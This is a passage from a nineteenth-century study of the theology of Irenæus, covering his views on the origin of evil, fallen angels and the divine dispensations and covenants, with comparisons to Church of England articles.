by the Spirit in union with them, and their bodies become spiritual
bodies248, and capable of immortality.

This is the substance of the doctrine of Irenæus on the Trinity, and it
will be seen that it is identical with that of the Church of England,
and that his way of carrying it out throws light on important
passages of Holy Writ; and if there had been nothing of interest to
us in this Treatise beyond these clear and direct testimonies to the
belief of the Church of that age on the fundamental doctrine of the
Gospel, we might well be glad that it was written and handed down
to our times.

[pg 103]
Chapter V. The Origin of Evil.

This being the subject out of which the Gnostic theories appear to
have arisen (there being so many attempts to account for it, without
in any wise bringing it into connexion with the Supreme Being), it
might, perhaps, have been expected that Irenæus should have
endeavoured to throw some light upon it. He has, however, taken a
much wiser course. He has altogether declined making it clear, and
thereby escaped the danger of inventing another heresy.

He grants, indeed, that there is sufficient ground for inquiring why
God has allowed evil and imperfection to exist; but he declares that
all things were intended by the Almighty to be created in the very
state and with the very qualities with which they were created249. He
will not allow that subsequent [pg 104] dispensations were really
intended to remedy the imperfections of prior ones, because that
would be to accuse God himself of not understanding at first the
effects of his works250.

He asserts, moreover, that supposing angels and men to have a
proper voluntary agency, to be endued with reason and the power of
examining and deciding upon examination, they must, in the very
nature of things, be capable of transgressing; and that, indeed,
otherwise excellence would not have been either pleasant or an
object of desire, because they would not have known its value,
neither would it have been capable of reward, or of being enjoyed
when attained; nor would intercourse with God have been valued,
because it would have come without any impulse, choice, care, or
endeavour of their own251. This is the only approach to a solution of
[pg 105] the difficulty which all the study of philosophers and divines
has ever discovered.

But when we come to inquire why some of God's creatures
transgressed, and some continued in obedience, this, he says, is a
mystery which God has reserved to himself, and which it is
presumption for us to inquire into; and that we ought to consider
what it has pleased him to reveal as a favour, and leave to him that
which he has not thought proper to make known252.

[pg 106]
He notwithstanding suggests this practical good arising out of the
existence of evil, that the love of God will be more earnestly
cherished for ever by those who have known by experience the evil
of sin, and have obtained their deliverance from it not without their
own exertion; and therefore that this may be regarded as a reason
why God permitted evil253.

The sobriety of these views is so obvious, that it appears
unnecessary to dwell further upon them.

[pg 107]
Chapter VI. The Evil Spirits.

Although Irenæus does not think proper to discuss the subject of the
origin of evil, properly so called, he speaks agreeably to the
Scriptures as to its introduction into this lower world, and in some
degree fills up their outline. Thus he describes Satan as having been
originally one of the angels who had power over the air254. He
attributes the beginning of his overt acts of rebellion to his envy
towards man255, because he had been made in the image of [pg
108] God, i. e. immortal256; whom through envy he stirred up to
rebellion likewise257, and that by falsehood258, [pg 109] putting on
the form of the serpent, that he might escape the eye of God259:
wherefore, although God had pity upon man, as having fallen
through weakness260, and because otherwise Satan would have
frustrated the Divine purpose261, he totally cut off from himself the
apostate angels262, and doomed them and their Prince to the eternal
fire263, which he had from the beginning prepared for obstinate
transgressors264, [pg 110] although he did not make known to them
at that time that their lot was irremediable265.

The next act of the apostate spirits was to mingle themselves with
human nature by carnal copulation with women, and thus to cause
the total corruption of the old world and its inhabitants
(notwithstanding the preaching of Enoch to these fallen spirits), and
consequently their destruction266.

[pg 111]
Irenæus makes none but very general allusions to the agency of the
fallen spirits from the fall of man till the coming of Christ. He
declares that, up to that time267, they had not ventured upon
blaspheming God; but that then, becoming aware that everlasting
fire was the appointed recompense of those who continued [pg 112]
in rebellion without repentance, they felt themselves already
condemned, and waxing desperate, charged all the sin of their
rebellion on their Maker, by inspiring the Gnostics with their impious
tenets268. It seems to be implied that sentence is not yet pronounced
upon the fallen angels269.

[pg 113]
Chapter VII. The Divine Dispensations.

After the introduction of evil into creation, and the agency by which
it is propagated in the world, we have next to notice the Divine plans
for its counteraction and removal; and as Irenæus was opposing the
Gnostic notion that the whole government of the world, prior to the
Gospel, was in the hands of beings adverse to the Supreme Being,
he was naturally led to show that, on the contrary, the whole history
of mankind has been a series of dispensations emanating from one
and the same Supreme and only God.

We have already270 seen him stating that the whole of these
dispensations were planned from the beginning; and he states them
to have been carried into execution by God the Son exhibiting
himself to mankind under four different aspects, figured by the [pg
114] four faces of the cherubim; first to the Patriarchs, in a kingly
and divine character; secondly, under the law, in a priestly and
sacrificial aspect; thirdly, at his nativity, as a man; fourthly, after his
ascension, by his Spirit271.

Again, he represents God as having made four covenants with
mankind; one with Noah, of which the rainbow was the sanction; a
second with Abraham, by circumcision; a third of the law, by Moses;
a fourth of the Gospel, by Christ272. At least this is [pg 115] the
enumeration made in the Questions and Answers of Anastasius, and
in the Theoria Rerum Ecclesiasticarum of Germanus, where the
Greek of Irenæus is transcribed, and from which it was first
published by Grabe. But the old Latin version makes a different
enumeration, reckoning the first covenant before the deluge with
Adam, and the second after that event with Noah273.

He thinks that the knowledge of God was kept up amongst the
patriarchs by tradition from Adam, and amongst the Jews by the
prophets; whilst in heathen nations the tradition has been lost, and
men are left to find it out by reason274: that human governments
were providentially ordained to restrain the ferocity and rapacity of
mankind after they had given up the fear of God275; that the law of
Moses was given [pg 116] by way of discipline, to recover the
Israelites back to that sense of justice, and responsibility, and feeling
of love to God and man which they had lost276; that [pg 117] the
prophets were inspired in order to accustom man by degrees to bear
God's Spirit and to have communion with him277: and thus in various
ways God prepared mankind for salvation, providing for them laws
suited to their various states of preparation.

In opposing the notions of the Gnostics, Irenæus had to defend the
position that the Old Testament is not contrary to the New; that they
both emanated from the same God acting differently under different
circumstances. The abolition of the law, he contended, was no proof
of a change of mind, but only of a change of circumstances; the law
being in its nature symbolical and preparatory, when the Gospel, the
reality and the end, was revealed, the office of the law ceased278.

[pg 118]
He distinguishes, however, between what he calls the natural
portions of the law and the rest. As they were kept by good men
before the law279, so he conceives them to be binding on us ever
since280. It [pg 119] is not at first sight clear what he means by that
term, but he expressly informs us that he comprises in it the whole
decalogue281. And yet there is every appearance that he would
exclude the fourth commandment, which he expressly asserts not to
have been observed before the giving of the law282.

But although the precepts of the moral law are equally binding at all
times, he thought that they were not formally given to the just men
of old, because they observed them voluntarily, being a law unto
themselves283. But when God's people forgot [pg 120] them in the
land of Egypt, then it became necessary distinctly to enact them, to
prepare man for the fuller duties of love to God and goodwill to
man284. And when they did not obey the moral law, he added to it
the ceremonial285, that, by types, their servile and childish natures
might be trained up to the apprehension of realities; by temporal
things, of eternal; by carnal, of spiritual; by earthly, of heavenly286.
Some of their ordinances had a twofold use; as circumcision was
intended, equally with their rites and ceremonies, to keep them
distinct from the heathen, and also to signify the circumcision of the
soul287.

[pg 121]
To show that the moral law was preparatory to the Gospel, he
alleges the fact that Jesus taught its precepts as the way of life to
the young lawyer who came to inquire of him; not supposing that
these were sufficient in themselves, but that they were steps to the
knowledge of Christ288.

He, however, thought that our Lord wished that the whole
ceremonial law should be observed as long as Jerusalem stood289.

But although he appears to think that the law, as a whole and in the
letter, is no longer binding to Christians, he does not think that this
leaves us at liberty to do as we like. If we are not tied down [pg
122] to the letter, like slaves, that is because it was intended that
the law of liberty should be of wider range, and our obedience
extend itself beyond the letter, and that our subjection to our
Heavenly King should be more hearty and thoroughgoing than ever;
and therefore, if we wish to remain in the way of salvation through
Christ, we must voluntarily adopt the precepts of the decalogue,
and, giving them a completer meaning, endeavour to realize in our
conduct all the fulness of their enlarged application290.

[pg 123]
It is almost unnecessary to point out the exact agreement of these
sentiments with the seventh and fourteenth articles of the Church of
England, and how impossible it must be for a person holding them
to think that we can do any thing whatever beyond what Christ has
a right to expect from us. It is manifest that he would not have
thought that any degrees of Christian holiness are really at our
option, whether we shall seek them or not; but that every person
who, having any degree of perfection, or any means of advancement
placed before him, knowingly neglects it, becomes thereby unworthy
of him who has given him liberty291, and hazards his salvation: in
short, that “to whom much is given, of him will much be required.”

[pg 124]